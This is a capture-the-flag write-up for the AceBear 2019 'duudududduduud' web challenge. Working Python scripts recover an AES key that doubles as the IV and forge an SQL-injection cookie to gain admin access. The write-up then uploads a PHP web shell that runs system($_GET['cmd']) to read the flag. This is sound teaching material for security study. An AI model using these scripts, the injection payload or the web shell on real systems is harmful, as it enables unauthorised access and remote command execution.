Tags: web aes crypto
Rating: 5.0
# WEB : duudududduduud
Given a website
And a hint : backup.bak?
> The hint is backup.bak
> Which Means there is a backup file ,
> Dowloaded the backup.bak and rename to backup.tgz & Extract it
> There we get the source code
### On Inscepting the [soure code](https://github.com/D1r3Wolf/CTF-writeups/tree/master/Acebear-2019/duudududduduud/backup)
> We need to be a admin in order to upload files
> No one can became an admin
* But There is bug to expliot to became a admin
> An SQL injection in [login.php](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/backup/login.php) & This is the only SQL injection in the site
$username = check_cookie($_COOKIE["session_remember"],$key);
$tmp = $username;
$username = explode("|thisisareallyreallylongstringasfalsfassfasfaasff",$username)[0];
$query = "SELECT username,admin FROM Users WHERE username='$username'";
$username is directly placed into the $query
But the $username is coming from the check_cookie($_COOKIE["session_remember"])
check_cookie is in /lib/connection.php ,
It is an AES decryption ;
Our need is to make the check_cookie to return our needed string ; For that
We have to send the Our Encrypted Text with the key in server
Then the server decrypts it and returns it ; which leads to the Injection in sql query
For the Encryption we need the Key ::
WE need to leak the Key from the server
Once again checking the check_cookie function
function check_cookie($token,$key)
$aes = new Aes($key, 'CBC', $key);
$token = base64_decode($token);
return $aes->decrypt($token);
$aes = new Aes($key, 'CBC', $key);
Here is the Bug , The key is used for IV ;
In aes There is no way to get the Key from Encryption or Decryption
But There is chance to get the IV in AES Decryption
Let's Take 2 Block's AES encryption
pt1 = Dec(ct1) ^ iv pt2 = Dec(ct2) ^ ct1
What is in our control is cipher text : (ct1,ct2)
Now take ct1 = ct2 = blk
pt1 = Dec(blk) ^ iv pt2 = Dec(blk) ^ blk
After Decryption it return pt1 , pt2
Now In [ pt2 = Dec(blk) ^ blk ] we know (blk,pt2)
Then Dec(blk) = pt2 ^ blk # Here we get the Dec(blk) value
Now In [ pt1 = Dec(blk) ^ iv ] we know (pt1, Dec(blk) also)
iv = pt1 ^ Dec(blk)
----------- iv = pt1 ^ pt2 ^ blk ----------------------
> How we get the plain text ;
$username = check_cookie($_COOKIE["session_remember"],$key);
$tmp = $username;
$username = explode("|thisisareallyreallylongstringasfalsfassfasfaasff",$username)[0];
$query = "SELECT username,admin FROM Users WHERE username='$username'";
$result = $conn->query($query);
if ($result->num_rows === 1)
while($row = $result->fetch_assoc())
$_SESSION["is_logged"] = true;
$_SESSION["username"] = $row["username"];
$_SESSION["admin"] = $row["admin"];
$_SESSION["folder"] = "uploads/".md5($username);
header("Location: index.php");
die("Error : ".base64_encode($tmp)." is not a valid cookie or is expired!");
// Here the $tmp is plaintext ; It returns a Error Msg with plaintext
### Extracting the IV :: [key.py](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/key.py)
from requests import session
from base64 import b64encode,b64decode
url = ""
def Xor(A,B):
return ''.join([chr( ord(i)^ord(j) ) for i,j in zip(A,B)])
def Extract_iv():
S = session()
blk = "A"*16
cks = {
"session_remember" : b64encode(blk*2)
Text = S.get(url,cookies=cks).text
s = Text.find("Error : ")+8
e = Text.find(" is not a valid cookie or is expired!")
Pt = b64decode(Text[s:e])
pt1 = Pt[:16] ; pt2 = Pt[16:]
key = Xor( Xor(pt1,pt2) , blk )
return key
if __name__ == '__main__':
print (Extract_iv())
* output
$ python exp.py
> Now we got the Key ; We can send whatever we want by encrypting it
> The server decrypt's it and places it in sql query
### Checking the Injection
$query = "SELECT username,admin FROM Users WHERE username='$username'";
There may or maybe admin account's , But there is no need of database concept ;
Because we are in select statement ; we can use UNION
like SELECT username,admin FROM Users WHERE username='' UNION select 'D1r3Wolf',1;#
Simply username = D1r3Wolf
&& admin = 1 # means true
And there is a stement behind sql query
$username = explode("|thisisareallyreallylongstringasfalsfassfasfaasff",$username)[0];
We need to pad the payload with "|thisisareallyreallylongstringasfalsfassfasfaasff"
def pad(S):
return S + '\x00'*( 16-(len(S)%16) )
payload = "' UNION SELECT 'D1r3Wolf',1;#"
payload += "|thisisareallyreallylongstringasfalsfassfasfaasff"
payload = pad(payload) # Because AES encrytion , decrytion goes in Blocks
### Making a cookie: [cookie.py](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/cookie.py)
from requests import session
from base64 import b64encode,b64decode
from Crypto.Cipher import AES
from key import Extract_iv
def Encrypt(S):
A = AES.new(key,AES.MODE_CBC,key)
Ct = A.encrypt(S)
return b64encode(Ct)
key = Extract_iv()
def pad(S):
return S + '\x00'*( 16-(len(S)%16) )
payload = "' UNION SELECT 'D1r3Wolf',1;#"
payload += "|thisisareallyreallylongstringasfalsfassfasfaasff"
payload = pad(payload)
cookie = Encrypt(payload)
print "[+] cookie :",cookie
* output
$ python cookie.py
[+] cookie : 1FpxWQyccSU6z6xePwv990SfdilJUgIUpg0RHTss5Zcq92uLD6Va4KjpdHpBzpVDAF4SqdtAhYcPJozz99brGSY0c9ERNM1cFk8JLO7VR5Q=
### Becoming an admin
Go to browser and use the cookie
session_remember : 1FpxWQyccSU6z6xePwv990SfdilJUgIUpg0RHTss5Zcq92uLD6Va4KjpdHpBzpVDAF4SqdtAhYcPJozz99brGSY0c9ERNM1cFk8JLO7VR5Q= # (other cookie value)
### here we go
**There is a upload option for admin**
> Now on checking the [upload.php](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/backup/upload.php)
$json = json_decode(file_get_contents($_SESSION["folder"]."/manifest.json"),true);
if ($json["type"] !== "h4x0r" || !isset($json["name"]))
exec(sprintf("rm -rf %s", escapeshellarg($_SESSION["folder"])));
$message = "Your file is invalid.";
$message = "Your file is successfully unzip-ed. Access your file at ".$_SESSION['folder']."/[your_file_name]";
we can create upload any files
But in those files there mush be a file 'manifest.json'
A json file with "type":"h4x0r","name":"anything"
> [manifest.json](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/manifest.json)
> [cmp.php](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/cmd.php)
"; $cmd = ($_GET['cmd']); system($cmd); echo ""; die; }
* zip those two files [evil.zip](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/evil.zip) && upload it to server
It Provided a path uploads/a3d7ebbe913126890938bdfe90833490/
Access them on
* OUR backdoor is working :)
* By the Given source code we can know that flag is at [lib/connection.php](https://github.com/D1r3Wolf/CTF-writeups/blob/master/Acebear-2019/duudududduduud/backup/lib/connection.php)
* path is `../../lib/connection.php`
* exploit is `view-source:`
* viewing source is important as the browser try's to parse the php ,So it Didn't display the php file properly
It is pretty interesting and
I liked this challenge very much
Thanks to
author: komang4130
### flag is : `AceBear{From_Crypt0_m1sus3_t0_Rc3_______}`